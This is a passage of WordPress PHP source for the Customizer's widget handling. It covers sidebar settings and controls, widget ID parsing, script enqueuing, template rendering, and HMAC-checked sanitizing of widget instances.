foreach ( $sidebars_widgets as $sidebar_id => $sidebar_widget_ids ) {
if ( empty( $sidebar_widget_ids ) ) {
$sidebar_widget_ids = array();
}
$is_registered_sidebar = is_registered_sidebar( $sidebar_id );
$is_inactive_widgets = ( 'wp_inactive_widgets' === $sidebar_id );
$is_active_sidebar = ( $is_registered_sidebar && ! $is_inactive_widgets );
// Add setting for managing the sidebar's widgets.
if ( $is_registered_sidebar || $is_inactive_widgets ) {
$setting_id = sprintf( 'sidebars_widgets[%s]', $sidebar_id );
$setting_args = $this->get_setting_args( $setting_id );
if ( ! $this->manager->get_setting( $setting_id ) ) {
if ( ! $this->manager->is_theme_active() ) {
$setting_args['dirty'] = true;
}
$this->manager->add_setting( $setting_id, $setting_args );
}
$new_setting_ids[] = $setting_id;
// Add section to contain controls.
$section_id = sprintf( 'sidebar-widgets-%s', $sidebar_id );
if ( $is_active_sidebar ) {
$section_args = array(
'title' => $wp_registered_sidebars[ $sidebar_id ]['name'],
'priority' => array_search( $sidebar_id, array_keys( $wp_registered_sidebars ), true ),
'panel' => 'widgets',
'sidebar_id' => $sidebar_id,
);
if ( $use_widgets_block_editor ) {
$section_args['description'] = '';
} else {
$section_args['description'] = $wp_registered_sidebars[ $sidebar_id ]['description'];
}
/**
* Filters Customizer widget section arguments for a given sidebar.
*
* @since 3.9.0
*
* @param array $section_args Array of Customizer widget section arguments.
* @param string $section_id Customizer section ID.
* @param int|string $sidebar_id Sidebar ID.
*/
$section_args = apply_filters( 'customizer_widgets_section_args', $section_args, $section_id, $sidebar_id );
$section = new WP_Customize_Sidebar_Section( $this->manager, $section_id, $section_args );
$this->manager->add_section( $section );
if ( $use_widgets_block_editor ) {
$control = new WP_Sidebar_Block_Editor_Control(
$this->manager,
$setting_id,
array(
'section' => $section_id,
'sidebar_id' => $sidebar_id,
'label' => $section_args['title'],
'description' => $section_args['description'],
)
);
} else {
$control = new WP_Widget_Area_Customize_Control(
$this->manager,
$setting_id,
array(
'section' => $section_id,
'sidebar_id' => $sidebar_id,
'priority' => count( $sidebar_widget_ids ), // place 'Add Widget' and 'Reorder' buttons at end.
)
);
}
$this->manager->add_control( $control );
$new_setting_ids[] = $setting_id;
}
}
if ( ! $use_widgets_block_editor ) {
// Add a control for each active widget (located in a sidebar).
foreach ( $sidebar_widget_ids as $i => $widget_id ) {
// Skip widgets that may have gone away due to a plugin being deactivated.
if ( ! $is_active_sidebar || ! isset( $wp_registered_widgets[ $widget_id ] ) ) {
continue;
}
$registered_widget = $wp_registered_widgets[ $widget_id ];
$setting_id = $this->get_setting_id( $widget_id );
$id_base = $wp_registered_widget_controls[ $widget_id ]['id_base'];
$control = new WP_Widget_Form_Customize_Control(
$this->manager,
$setting_id,
array(
'label' => $registered_widget['name'],
'section' => $section_id,
'sidebar_id' => $sidebar_id,
'widget_id' => $widget_id,
'widget_id_base' => $id_base,
'priority' => $i,
'width' => $wp_registered_widget_controls[ $widget_id ]['width'],
'height' => $wp_registered_widget_controls[ $widget_id ]['height'],
'is_wide' => $this->is_wide_widget( $widget_id ),
)
);
$this->manager->add_control( $control );
}
}
}
if ( $this->manager->settings_previewed() ) {
foreach ( $new_setting_ids as $new_setting_id ) {
$this->manager->get_setting( $new_setting_id )->preview();
}
}
}
/**
* Determines whether the widgets panel is active, based on whether there are sidebars registered.
*
* @since 4.4.0
*
* @see WP_Customize_Panel::$active_callback
*
* @global array $wp_registered_sidebars
*
* @return bool Active.
*/
public function is_panel_active() {
global $wp_registered_sidebars;
return ! empty( $wp_registered_sidebars );
}
/**
* Converts a widget_id into its corresponding Customizer setting ID (option name).
*
* @since 3.9.0
*
* @param string $widget_id Widget ID.
* @return string Maybe-parsed widget ID.
*/
public function get_setting_id( $widget_id ) {
$parsed_widget_id = $this->parse_widget_id( $widget_id );
$setting_id = sprintf( 'widget_%s', $parsed_widget_id['id_base'] );
if ( ! is_null( $parsed_widget_id['number'] ) ) {
$setting_id .= sprintf( '[%d]', $parsed_widget_id['number'] );
}
return $setting_id;
}
/**
* Determines whether the widget is considered "wide".
*
* Core widgets which may have controls wider than 250, but can still be shown
* in the narrow Customizer panel. The RSS and Text widgets in Core, for example,
* have widths of 400 and yet they still render fine in the Customizer panel.
*
* This method will return all Core widgets as being not wide, but this can be
* overridden with the {@see 'is_wide_widget_in_customizer'} filter.
*
* @since 3.9.0
*
* @global array $wp_registered_widget_controls
*
* @param string $widget_id Widget ID.
* @return bool Whether or not the widget is a "wide" widget.
*/
public function is_wide_widget( $widget_id ) {
global $wp_registered_widget_controls;
$parsed_widget_id = $this->parse_widget_id( $widget_id );
$width = $wp_registered_widget_controls[ $widget_id ]['width'];
$is_core = in_array( $parsed_widget_id['id_base'], $this->core_widget_id_bases, true );
$is_wide = ( $width > 250 && ! $is_core );
/**
* Filters whether the given widget is considered "wide".
*
* @since 3.9.0
*
* @param bool $is_wide Whether the widget is wide, Default false.
* @param string $widget_id Widget ID.
*/
return apply_filters( 'is_wide_widget_in_customizer', $is_wide, $widget_id );
}
/**
* Converts a widget ID into its id_base and number components.
*
* @since 3.9.0
*
* @param string $widget_id Widget ID.
* @return array Array containing a widget's id_base and number components.
*/
public function parse_widget_id( $widget_id ) {
$parsed = array(
'number' => null,
'id_base' => null,
);
if ( preg_match( '/^(.+)-(\d+)$/', $widget_id, $matches ) ) {
$parsed['id_base'] = $matches[1];
$parsed['number'] = (int) $matches[2];
} else {
// Likely an old single widget.
$parsed['id_base'] = $widget_id;
}
return $parsed;
}
/**
* Converts a widget setting ID (option path) to its id_base and number components.
*
* @since 3.9.0
*
* @param string $setting_id Widget setting ID.
* @return array|WP_Error Array containing a widget's id_base and number components,
* or a WP_Error object.
*/
public function parse_widget_setting_id( $setting_id ) {
if ( ! preg_match( '/^(widget_(.+?))(?:\[(\d+)\])?$/', $setting_id, $matches ) ) {
return new WP_Error( 'widget_setting_invalid_id' );
}
$id_base = $matches[2];
$number = isset( $matches[3] ) ? (int) $matches[3] : null;
return compact( 'id_base', 'number' );
}
/**
* Calls admin_print_styles-widgets.php and admin_print_styles hooks to
* allow custom styles from plugins.
*
* @since 3.9.0
*/
public function print_styles() {
/** This action is documented in wp-admin/admin-header.php */
do_action( 'admin_print_styles-widgets.php' ); // phpcs:ignore WordPress.NamingConventions.ValidHookName.UseUnderscores
/** This action is documented in wp-admin/admin-header.php */
do_action( 'admin_print_styles' );
}
/**
* Calls admin_print_scripts-widgets.php and admin_print_scripts hooks to
* allow custom scripts from plugins.
*
* @since 3.9.0
*/
public function print_scripts() {
/** This action is documented in wp-admin/admin-header.php */
do_action( 'admin_print_scripts-widgets.php' ); // phpcs:ignore WordPress.NamingConventions.ValidHookName.UseUnderscores
/** This action is documented in wp-admin/admin-header.php */
do_action( 'admin_print_scripts' );
}
/**
* Enqueues scripts and styles for Customizer panel and export data to JavaScript.
*
* @since 3.9.0
*
* @global WP_Scripts $wp_scripts
* @global array $wp_registered_sidebars
* @global array $wp_registered_widgets
*/
public function enqueue_scripts() {
global $wp_scripts, $wp_registered_sidebars, $wp_registered_widgets;
wp_enqueue_style( 'customize-widgets' );
wp_enqueue_script( 'customize-widgets' );
/** This action is documented in wp-admin/admin-header.php */
do_action( 'admin_enqueue_scripts', 'widgets.php' );
/*
* Export available widgets with control_tpl removed from model
* since plugins need templates to be in the DOM.
*/
$available_widgets = array();
foreach ( $this->get_available_widgets() as $available_widget ) {
unset( $available_widget['control_tpl'] );
$available_widgets[] = $available_widget;
}
$widget_reorder_nav_tpl = sprintf(
'<div class="widget-reorder-nav"><span class="move-widget" tabindex="0">%1$s</span><span class="move-widget-down" tabindex="0">%2$s</span><span class="move-widget-up" tabindex="0">%3$s</span></div>',
__( 'Move to another area…' ),
__( 'Move down' ),
__( 'Move up' )
);
$move_widget_area_tpl = str_replace(
array( '{description}', '{btn}' ),
array(
__( 'Select an area to move this widget into:' ),
_x( 'Move', 'Move widget' ),
),
'<div class="move-widget-area">
<p class="description">{description}</p>
<ul class="widget-area-select">
<% _.each( sidebars, function ( sidebar ){ %>
<li class="" data-id="<%- sidebar.id %>" tabindex="0">
<div><strong><%- sidebar.name %></strong></div>
<div><%- sidebar.description %></div>
</li>
<% }); %>
</ul>
<div class="move-widget-actions">
<button class="move-widget-btn button" type="button">{btn}</button>
</div>
</div>'
);
/*
* Gather all strings in PHP that may be needed by JS on the client.
* Once JS i18n is implemented (in #20491), this can be removed.
*/
$some_non_rendered_areas_messages = array();
$some_non_rendered_areas_messages[1] = html_entity_decode(
__( 'Your theme has 1 other widget area, but this particular page does not display it.' ),
ENT_QUOTES,
get_bloginfo( 'charset' )
);
$registered_sidebar_count = count( $wp_registered_sidebars );
for ( $non_rendered_count = 2; $non_rendered_count < $registered_sidebar_count; $non_rendered_count++ ) {
$some_non_rendered_areas_messages[ $non_rendered_count ] = html_entity_decode(
sprintf(
/* translators: %s: The number of other widget areas registered but not rendered. */
_n(
'Your theme has %s other widget area, but this particular page does not display it.',
'Your theme has %s other widget areas, but this particular page does not display them.',
$non_rendered_count
),
number_format_i18n( $non_rendered_count )
),
ENT_QUOTES,
get_bloginfo( 'charset' )
);
}
if ( 1 === $registered_sidebar_count ) {
$no_areas_shown_message = html_entity_decode(
sprintf(
__( 'Your theme has 1 widget area, but this particular page does not display it.' )
),
ENT_QUOTES,
get_bloginfo( 'charset' )
);
} else {
$no_areas_shown_message = html_entity_decode(
sprintf(
/* translators: %s: The total number of widget areas registered. */
_n(
'Your theme has %s widget area, but this particular page does not display it.',
'Your theme has %s widget areas, but this particular page does not display them.',
$registered_sidebar_count
),
number_format_i18n( $registered_sidebar_count )
),
ENT_QUOTES,
get_bloginfo( 'charset' )
);
}
$settings = array(
'registeredSidebars' => array_values( $wp_registered_sidebars ),
'registeredWidgets' => $wp_registered_widgets,
'availableWidgets' => $available_widgets, // @todo Merge this with registered_widgets.
'l10n' => array(
'saveBtnLabel' => __( 'Apply' ),
'saveBtnTooltip' => __( 'Save and preview changes before publishing them.' ),
'removeBtnLabel' => __( 'Remove' ),
'removeBtnTooltip' => __( 'Keep widget settings and move it to the inactive widgets' ),
'error' => __( 'An error has occurred. Please reload the page and try again.' ),
'widgetMovedUp' => __( 'Widget moved up' ),
'widgetMovedDown' => __( 'Widget moved down' ),
'navigatePreview' => __( 'You can navigate to other pages on your site while using the Customizer to view and edit the widgets displayed on those pages.' ),
'someAreasShown' => $some_non_rendered_areas_messages,
'noAreasShown' => $no_areas_shown_message,
'reorderModeOn' => __( 'Reorder mode enabled' ),
'reorderModeOff' => __( 'Reorder mode closed' ),
'reorderLabelOn' => esc_attr__( 'Reorder widgets' ),
/* translators: %d: The number of widgets found. */
'widgetsFound' => __( 'Number of widgets found: %d' ),
'noWidgetsFound' => __( 'No widgets found.' ),
),
'tpl' => array(
'widgetReorderNav' => $widget_reorder_nav_tpl,
'moveWidgetArea' => $move_widget_area_tpl,
),
'selectiveRefreshableWidgets' => $this->get_selective_refreshable_widgets(),
);
foreach ( $settings['registeredWidgets'] as &$registered_widget ) {
unset( $registered_widget['callback'] ); // May not be JSON-serializable.
}
$wp_scripts->add_data(
'customize-widgets',
'data',
sprintf( 'var _wpCustomizeWidgetsSettings = %s;', wp_json_encode( $settings, JSON_HEX_TAG | JSON_UNESCAPED_SLASHES ) )
);
/*
* TODO: Update 'wp-customize-widgets' to not rely so much on things in
* 'customize-widgets'. This will let us skip most of the above and not
* enqueue 'customize-widgets' which saves bytes.
*/
if ( wp_use_widgets_block_editor() ) {
$block_editor_context = new WP_Block_Editor_Context(
array(
'name' => 'core/customize-widgets',
)
);
$editor_settings = get_block_editor_settings(
get_legacy_widget_block_editor_settings(),
$block_editor_context
);
wp_add_inline_script(
'wp-customize-widgets',
sprintf(
'wp.domReady( function() {
wp.customizeWidgets.initialize( "widgets-customizer", %s );
} );',
wp_json_encode( $editor_settings, JSON_HEX_TAG | JSON_UNESCAPED_SLASHES )
)
);
// Preload server-registered block schemas.
wp_add_inline_script(
'wp-blocks',
'wp.blocks.unstable__bootstrapServerSideBlockDefinitions(' . wp_json_encode( get_block_editor_server_block_settings(), JSON_HEX_TAG | JSON_UNESCAPED_SLASHES ) . ');'
);
// Preload server-registered block bindings sources.
$registered_sources = get_all_registered_block_bindings_sources();
if ( ! empty( $registered_sources ) ) {
$filtered_sources = array();
foreach ( $registered_sources as $source ) {
$filtered_sources[] = array(
'name' => $source->name,
'label' => $source->label,
'usesContext' => $source->uses_context,
);
}
$script = sprintf( 'for ( const source of %s ) { wp.blocks.registerBlockBindingsSource( source ); }', wp_json_encode( $filtered_sources, JSON_HEX_TAG | JSON_UNESCAPED_SLASHES ) );
wp_add_inline_script(
'wp-blocks',
$script
);
}
wp_add_inline_script(
'wp-blocks',
sprintf( 'wp.blocks.setCategories( %s );', wp_json_encode( get_block_categories( $block_editor_context ), JSON_HEX_TAG | JSON_UNESCAPED_SLASHES ) ),
'after'
);
wp_enqueue_script( 'wp-customize-widgets' );
wp_enqueue_style( 'wp-customize-widgets' );
/** This action is documented in edit-form-blocks.php */
do_action( 'enqueue_block_editor_assets' );
}
}
/**
* Renders the widget form control templates into the DOM.
*
* @since 3.9.0
*/
public function output_widget_control_templates() {
?>
<div id="widgets-left"><!-- compatibility with JS which looks for widget templates here -->
<div id="available-widgets">
<div class="customize-section-title">
<button class="customize-section-back" tabindex="-1">
<span class="screen-reader-text">
<?php
/* translators: Hidden accessibility text. */
_e( 'Back' );
?>
</span>
</button>
<h3>
<span class="customize-action">
<?php
$panel = $this->manager->get_panel( 'widgets' );
$panel_title = isset( $panel->title ) ? $panel->title : __( 'Widgets' );
/* translators: ▸ is the unicode right-pointing triangle. %s: Section title in the Customizer. */
printf( __( 'Customizing ▸ %s' ), esc_html( $panel_title ) );
?>
</span>
<?php _e( 'Add a Widget' ); ?>
</h3>
</div>
<div id="available-widgets-filter">
<label for="widgets-search">
<?php
/* translators: Hidden accessibility text. */
_e( 'Search Widgets' );
?>
</label>
<input type="text" id="widgets-search" aria-describedby="widgets-search-desc" />
<div class="search-icon" aria-hidden="true"></div>
<button type="button" class="clear-results"><span class="screen-reader-text">
<?php
/* translators: Hidden accessibility text. */
_e( 'Clear Results' );
?>
</span></button>
<p class="screen-reader-text" id="widgets-search-desc">
<?php
/* translators: Hidden accessibility text. */
_e( 'The search results will be updated as you type.' );
?>
</p>
</div>
<div id="available-widgets-list">
<?php foreach ( $this->get_available_widgets() as $available_widget ) : ?>
<div id="widget-tpl-<?php echo esc_attr( $available_widget['id'] ); ?>" data-widget-id="<?php echo esc_attr( $available_widget['id'] ); ?>" class="widget-tpl <?php echo esc_attr( $available_widget['id'] ); ?>" tabindex="0">
<?php echo $available_widget['control_tpl']; ?>
</div>
<?php endforeach; ?>
<p class="no-widgets-found-message"><?php _e( 'No widgets found.' ); ?></p>
</div><!-- #available-widgets-list -->
</div><!-- #available-widgets -->
</div><!-- #widgets-left -->
<?php
}
/**
* Calls admin_print_footer_scripts and admin_print_scripts hooks to
* allow custom scripts from plugins.
*
* @since 3.9.0
*/
public function print_footer_scripts() {
/** This action is documented in wp-admin/admin-footer.php */
do_action( 'admin_print_footer_scripts-widgets.php' ); // phpcs:ignore WordPress.NamingConventions.ValidHookName.UseUnderscores
/** This action is documented in wp-admin/admin-footer.php */
do_action( 'admin_print_footer_scripts' );
/** This action is documented in wp-admin/admin-footer.php */
do_action( 'admin_footer-widgets.php' ); // phpcs:ignore WordPress.NamingConventions.ValidHookName.UseUnderscores
}
/**
* Retrieves common arguments to supply when constructing a Customizer setting.
*
* @since 3.9.0
*
* @param string $id Widget setting ID.
* @param array $overrides Array of setting overrides.
* @return array Possibly modified setting arguments.
*/
public function get_setting_args( $id, $overrides = array() ) {
$args = array(
'type' => 'option',
'capability' => 'edit_theme_options',
'default' => array(),
);
if ( preg_match( $this->setting_id_patterns['sidebar_widgets'], $id, $matches ) ) {
$args['sanitize_callback'] = array( $this, 'sanitize_sidebar_widgets' );
$args['sanitize_js_callback'] = array( $this, 'sanitize_sidebar_widgets_js_instance' );
$args['transport'] = current_theme_supports( 'customize-selective-refresh-widgets' ) ? 'postMessage' : 'refresh';
} elseif ( preg_match( $this->setting_id_patterns['widget_instance'], $id, $matches ) ) {
$id_base = $matches['id_base'];
$args['sanitize_callback'] = function ( $value ) use ( $id_base ) {
return $this->sanitize_widget_instance( $value, $id_base );
};
$args['sanitize_js_callback'] = function ( $value ) use ( $id_base ) {
return $this->sanitize_widget_js_instance( $value, $id_base );
};
$args['transport'] = $this->is_widget_selective_refreshable( $matches['id_base'] ) ? 'postMessage' : 'refresh';
}
$args = array_merge( $args, $overrides );
/**
* Filters the common arguments supplied when constructing a Customizer setting.
*
* @since 3.9.0
*
* @see WP_Customize_Setting
*
* @param array $args Array of Customizer setting arguments.
* @param string $id Widget setting ID.
*/
return apply_filters( 'widget_customizer_setting_args', $args, $id );
}
/**
* Ensures sidebar widget arrays only ever contain widget IDS.
*
* Used as the 'sanitize_callback' for each $sidebars_widgets setting.
*
* @since 3.9.0
*
* @param string[] $widget_ids Array of widget IDs.
* @return string[] Array of sanitized widget IDs.
*/
public function sanitize_sidebar_widgets( $widget_ids ) {
$widget_ids = array_map( 'strval', (array) $widget_ids );
$sanitized_widget_ids = array();
foreach ( $widget_ids as $widget_id ) {
$sanitized_widget_ids[] = preg_replace( '/[^a-z0-9_\-]/', '', $widget_id );
}
return $sanitized_widget_ids;
}
/**
* Builds up an index of all available widgets for use in Backbone models.
*
* @since 3.9.0
*
* @global array $wp_registered_widgets
* @global array $wp_registered_widget_controls
*
* @see wp_list_widgets()
*
* @return array List of available widgets.
*/
public function get_available_widgets() {
static $available_widgets = array();
if ( ! empty( $available_widgets ) ) {
return $available_widgets;
}
global $wp_registered_widgets, $wp_registered_widget_controls;
require_once ABSPATH . 'wp-admin/includes/widgets.php'; // For next_widget_id_number().
$sort = $wp_registered_widgets;
usort( $sort, array( $this, '_sort_name_callback' ) );
$done = array();
foreach ( $sort as $widget ) {
if ( in_array( $widget['callback'], $done, true ) ) { // We already showed this multi-widget.
continue;
}
$sidebar = is_active_widget( $widget['callback'], $widget['id'], false, false );
$done[] = $widget['callback'];
if ( ! isset( $widget['params'][0] ) ) {
$widget['params'][0] = array();
}
$available_widget = $widget;
unset( $available_widget['callback'] ); // Not serializable to JSON.
$args = array(
'widget_id' => $widget['id'],
'widget_name' => $widget['name'],
'_display' => 'template',
);
$is_disabled = false;
$is_multi_widget = ( isset( $wp_registered_widget_controls[ $widget['id'] ]['id_base'] ) && isset( $widget['params'][0]['number'] ) );
if ( $is_multi_widget ) {
$id_base = $wp_registered_widget_controls[ $widget['id'] ]['id_base'];
$args['_temp_id'] = "$id_base-__i__";
$args['_multi_num'] = next_widget_id_number( $id_base );
$args['_add'] = 'multi';
} else {
$args['_add'] = 'single';
if ( $sidebar && 'wp_inactive_widgets' !== $sidebar ) {
$is_disabled = true;
}
$id_base = $widget['id'];
}
$list_widget_controls_args = wp_list_widget_controls_dynamic_sidebar(
array(
0 => $args,
1 => $widget['params'][0],
)
);
$control_tpl = $this->get_widget_control( $list_widget_controls_args );
// The properties here are mapped to the Backbone Widget model.
$available_widget = array_merge(
$available_widget,
array(
'temp_id' => isset( $args['_temp_id'] ) ? $args['_temp_id'] : null,
'is_multi' => $is_multi_widget,
'control_tpl' => $control_tpl,
'multi_number' => ( 'multi' === $args['_add'] ) ? $args['_multi_num'] : false,
'is_disabled' => $is_disabled,
'id_base' => $id_base,
'transport' => $this->is_widget_selective_refreshable( $id_base ) ? 'postMessage' : 'refresh',
'width' => $wp_registered_widget_controls[ $widget['id'] ]['width'],
'height' => $wp_registered_widget_controls[ $widget['id'] ]['height'],
'is_wide' => $this->is_wide_widget( $widget['id'] ),
)
);
$available_widgets[] = $available_widget;
}
return $available_widgets;
}
/**
* Naturally orders available widgets by name.
*
* @since 3.9.0
*
* @param array $widget_a The first widget to compare.
* @param array $widget_b The second widget to compare.
* @return int Reorder position for the current widget comparison.
*/
protected function _sort_name_callback( $widget_a, $widget_b ) {
return strnatcasecmp( $widget_a['name'], $widget_b['name'] );
}
/**
* Retrieves the widget control markup.
*
* @since 3.9.0
*
* @param array $args Widget control arguments.
* @return string Widget control form HTML markup.
*/
public function get_widget_control( $args ) {
$args[0]['before_form'] = '<div class="form">';
$args[0]['after_form'] = '</div><!-- .form -->';
$args[0]['before_widget_content'] = '<div class="widget-content">';
$args[0]['after_widget_content'] = '</div><!-- .widget-content -->';
ob_start();
wp_widget_control( ...$args );
$control_tpl = ob_get_clean();
return $control_tpl;
}
/**
* Retrieves the widget control markup parts.
*
* @since 4.4.0
*
* @param array $args Widget control arguments.
* @return array {
* @type string $control Markup for widget control wrapping form.
* @type string $content The contents of the widget form itself.
* }
*/
public function get_widget_control_parts( $args ) {
$args[0]['before_widget_content'] = '<div class="widget-content">';
$args[0]['after_widget_content'] = '</div><!-- .widget-content -->';
$control_markup = $this->get_widget_control( $args );
$content_start_pos = strpos( $control_markup, $args[0]['before_widget_content'] );
$content_end_pos = strrpos( $control_markup, $args[0]['after_widget_content'] );
$control = substr( $control_markup, 0, $content_start_pos + strlen( $args[0]['before_widget_content'] ) );
$control .= substr( $control_markup, $content_end_pos );
$content = trim(
substr(
$control_markup,
$content_start_pos + strlen( $args[0]['before_widget_content'] ),
$content_end_pos - $content_start_pos - strlen( $args[0]['before_widget_content'] )
)
);
return compact( 'control', 'content' );
}
/**
* Adds hooks for the Customizer preview.
*
* @since 3.9.0
*/
public function customize_preview_init() {
add_action( 'wp_enqueue_scripts', array( $this, 'customize_preview_enqueue' ) );
add_action( 'wp_print_styles', array( $this, 'print_preview_css' ), 1 );
add_action( 'wp_footer', array( $this, 'export_preview_data' ), 20 );
}
/**
* Refreshes the nonce for widget updates.
*
* @since 4.2.0
*
* @param array $nonces Array of nonces.
* @return array Array of nonces.
*/
public function refresh_nonces( $nonces ) {
$nonces['update-widget'] = wp_create_nonce( 'update-widget' );
return $nonces;
}
/**
* Tells the script loader to load the scripts and styles of custom blocks
* if the widgets block editor is enabled.
*
* @since 5.8.0
*
* @param bool $is_block_editor_screen Current decision about loading block assets.
* @return bool Filtered decision about loading block assets.
*/
public function should_load_block_editor_scripts_and_styles( $is_block_editor_screen ) {
if ( wp_use_widgets_block_editor() ) {
return true;
}
return $is_block_editor_screen;
}
/**
* When previewing, ensures the proper previewing widgets are used.
*
* Because wp_get_sidebars_widgets() gets called early at {@see 'init' } (via
* wp_convert_widget_settings()) and can set global variable `$_wp_sidebars_widgets`
* to the value of `get_option( 'sidebars_widgets' )` before the Customizer preview
* filter is added, it has to be reset after the filter has been added.
*
* @since 3.9.0
*
* @param array $sidebars_widgets List of widgets for the current sidebar.
* @return array
*/
public function preview_sidebars_widgets( $sidebars_widgets ) {
$sidebars_widgets = get_option( 'sidebars_widgets', array() );
unset( $sidebars_widgets['array_version'] );
return $sidebars_widgets;
}
/**
* Enqueues scripts for the Customizer preview.
*
* @since 3.9.0
*/
public function customize_preview_enqueue() {
wp_enqueue_script( 'customize-preview-widgets' );
}
/**
* Inserts default style for highlighted widget at early point so theme
* stylesheet can override.
*
* @since 3.9.0
*/
public function print_preview_css() {
?>
<style>
.widget-customizer-highlighted-widget {
outline: none;
-webkit-box-shadow: 0 0 2px rgba(30, 140, 190, 0.8);
box-shadow: 0 0 2px rgba(30, 140, 190, 0.8);
position: relative;
z-index: 1;
}
</style>
<?php
}
/**
* Communicates the sidebars that appeared on the page at the very end of the page,
* and at the very end of the wp_footer,
*
* @since 3.9.0
*
* @global array $wp_registered_sidebars
* @global array $wp_registered_widgets
*/
public function export_preview_data() {
global $wp_registered_sidebars, $wp_registered_widgets;
$switched_locale = switch_to_user_locale( get_current_user_id() );
$l10n = array(
'widgetTooltip' => __( 'Shift-click to edit this widget.' ),
);
if ( $switched_locale ) {
restore_previous_locale();
}
$rendered_sidebars = array_filter( $this->rendered_sidebars );
$rendered_widgets = array_filter( $this->rendered_widgets );
// Prepare Customizer settings to pass to JavaScript.
$settings = array(
'renderedSidebars' => array_fill_keys( array_keys( $rendered_sidebars ), true ),
'renderedWidgets' => array_fill_keys( array_keys( $rendered_widgets ), true ),
'registeredSidebars' => array_values( $wp_registered_sidebars ),
'registeredWidgets' => $wp_registered_widgets,
'l10n' => $l10n,
'selectiveRefreshableWidgets' => $this->get_selective_refreshable_widgets(),
);
foreach ( $settings['registeredWidgets'] as &$registered_widget ) {
unset( $registered_widget['callback'] ); // May not be JSON-serializable.
}
wp_print_inline_script_tag(
sprintf( 'var _wpWidgetCustomizerPreviewSettings = %s;', wp_json_encode( $settings, JSON_HEX_TAG | JSON_UNESCAPED_SLASHES ) ) . "\n//# sourceURL=" . rawurlencode( __METHOD__ )
);
}
/**
* Tracks the widgets that were rendered.
*
* @since 3.9.0
*
* @param array $widget Rendered widget to tally.
*/
public function tally_rendered_widgets( $widget ) {
$this->rendered_widgets[ $widget['id'] ] = true;
}
/**
* Determine if a widget is rendered on the page.
*
* @since 4.0.0
*
* @param string $widget_id Widget ID to check.
* @return bool Whether the widget is rendered.
*/
public function is_widget_rendered( $widget_id ) {
return ! empty( $this->rendered_widgets[ $widget_id ] );
}
/**
* Determines if a sidebar is rendered on the page.
*
* @since 4.0.0
*
* @param string $sidebar_id Sidebar ID to check.
* @return bool Whether the sidebar is rendered.
*/
public function is_sidebar_rendered( $sidebar_id ) {
return ! empty( $this->rendered_sidebars[ $sidebar_id ] );
}
/**
* Tallies the sidebars rendered via is_active_sidebar().
*
* Keep track of the times that is_active_sidebar() is called in the template,
* and assume that this means that the sidebar would be rendered on the template
* if there were widgets populating it.
*
* @since 3.9.0
*
* @param bool $is_active Whether the sidebar is active.
* @param string $sidebar_id Sidebar ID.
* @return bool Whether the sidebar is active.
*/
public function tally_sidebars_via_is_active_sidebar_calls( $is_active, $sidebar_id ) {
if ( is_registered_sidebar( $sidebar_id ) ) {
$this->rendered_sidebars[ $sidebar_id ] = true;
}
/*
* We may need to force this to true, and also force-true the value
* for 'dynamic_sidebar_has_widgets' if we want to ensure that there
* is an area to drop widgets into, if the sidebar is empty.
*/
return $is_active;
}
/**
* Tallies the sidebars rendered via dynamic_sidebar().
*
* Keep track of the times that dynamic_sidebar() is called in the template,
* and assume this means the sidebar would be rendered on the template if
* there were widgets populating it.
*
* @since 3.9.0
*
* @param bool $has_widgets Whether the current sidebar has widgets.
* @param string $sidebar_id Sidebar ID.
* @return bool Whether the current sidebar has widgets.
*/
public function tally_sidebars_via_dynamic_sidebar_calls( $has_widgets, $sidebar_id ) {
if ( is_registered_sidebar( $sidebar_id ) ) {
$this->rendered_sidebars[ $sidebar_id ] = true;
}
/*
* We may need to force this to true, and also force-true the value
* for 'is_active_sidebar' if we want to ensure there is an area to
* drop widgets into, if the sidebar is empty.
*/
return $has_widgets;
}
/**
* Retrieves MAC for a serialized widget instance string.
*
* Allows values posted back from JS to be rejected if any tampering of the
* data has occurred.
*
* @since 3.9.0
*
* @param string $serialized_instance Widget instance.
* @return string MAC for serialized widget instance.
*/
protected function get_instance_hash_key( $serialized_instance ) {
return wp_hash( $serialized_instance );
}
/**
* Sanitizes a widget instance.
*
* Unserialize the JS-instance for storing in the options. It's important that this filter
* only get applied to an instance *once*.
*
* @since 3.9.0
* @since 5.8.0 Added the `$id_base` parameter.
*
* @global WP_Widget_Factory $wp_widget_factory
*
* @param array $value Widget instance to sanitize.
* @param string $id_base Optional. Base of the ID of the widget being sanitized. Default null.
* @return array|void Sanitized widget instance.
*/
public function sanitize_widget_instance( $value, $id_base = null ) {
global $wp_widget_factory;
if ( array() === $value ) {
return $value;
}
if ( isset( $value['raw_instance'] ) && $id_base && wp_use_widgets_block_editor() ) {
$widget_object = $wp_widget_factory->get_widget_object( $id_base );
if ( ! empty( $widget_object->widget_options['show_instance_in_rest'] ) ) {
if ( 'block' === $id_base && ! current_user_can( 'unfiltered_html' ) ) {
/*
* The content of the 'block' widget is not filtered on the fly while editing.
* Filter the content here to prevent vulnerabilities.
*/
$value['raw_instance']['content'] = wp_kses_post( $value['raw_instance']['content'] );
}
return $value['raw_instance'];
}
}
if (
empty( $value['is_widget_customizer_js_value'] ) ||
empty( $value['instance_hash_key'] ) ||
empty( $value['encoded_serialized_instance'] )
) {
return;
}
$decoded = base64_decode( $value['encoded_serialized_instance'], true );
if ( false === $decoded ) {
return;
}
if ( ! hash_equals( $this->get_instance_hash_key( $decoded ), $value['instance_hash_key'] ) ) {
return;
}
$instance = unserialize( $decoded );
if ( false === $instance ) {
return;
}
return $instance;
}
/**
* Converts a widget instance into JSON-representable format.
*
* @since 3.9.0
* @since 5.8.0 Added the `$id_base` parameter.
*
* @global WP_Widget_Factory $wp_widget_factory
*
* @param array $value Widget instance to convert to JSON.
* @param string $id_base Optional. Base of the ID of the widget being sanitized. Default null.
* @return array JSON-converted widget instance.
*/
public function sanitize_widget_js_instance( $value, $id_base = null ) {
global $wp_widget_factory;
if ( empty( $value['is_widget_customizer_js_value'] ) ) {
$serialized = serialize( $value );
$js_value = array(
'encoded_serialized_instance' => base64_encode( $serialized ),
'title' => empty( $value['title'] ) ? '' : $value['title'],
'is_widget_customizer_js_value' => true,
'instance_hash_key' => $this->get_instance_hash_key( $serialized ),
);
if ( $id_base && wp_use_widgets_block_editor() ) {
$widget_object = $wp_widget_factory->get_widget_object( $id_base );
if ( ! empty( $widget_object->widget_options['show_instance_in_rest'] ) ) {
$js_value['raw_instance'] = (object) $value;
}
}
return $js_value;
}
return $value;
}
/**
* Strips out widget IDs for widgets which are no longer registered.
*
* One example where this might happen is when a plugin orphans a widget
* in a sidebar upon deactivation.
*
* @since 3.9.0
*
* @global array $wp_registered_widgets
*
* @param array $widget_ids List of widget IDs.
* @return array Parsed list of widget IDs.
